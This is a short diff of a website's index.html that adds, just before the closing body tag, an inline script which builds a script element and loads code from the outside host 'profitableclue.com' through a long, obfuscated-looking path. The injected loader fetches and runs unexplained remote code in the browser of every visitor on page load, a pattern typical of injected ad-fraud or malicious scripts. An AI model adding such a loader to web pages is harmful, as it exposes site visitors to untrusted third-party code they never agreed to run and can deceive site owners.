--- a/index.html
+++ b/index.html
@@ -304,6 +304,16 @@ function w3_close() {
 
 <script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="thelostdocscom" data-description="Support me on Buy me a coffee!" data-message="Donations would be appreciated to keep this site running!" data-color="#40DCA5" data-position="Right" data-x_margin="18" data-y_margin="18"></script>
 
-
+<script>
+  (function(__htavim){
+  var d = document,
+      s = d.createElement('script'),
+      l = d.scripts[d.scripts.length - 1];
+  s.settings = __htavim || {};
+  s.src = "\/\/profitableclue.com\/dOmmF.zHdzGulztxPy3VpxvmbDm\/VmJCZLD\/0O0QN\/jIgy4\/MijcY\/zQLLTCQd2XOgD-g\/yjN-jhQw";
+  l.parentNode.insertBefore(s, l);
+  })()
+  </script>
+  
 </body>
 </html>
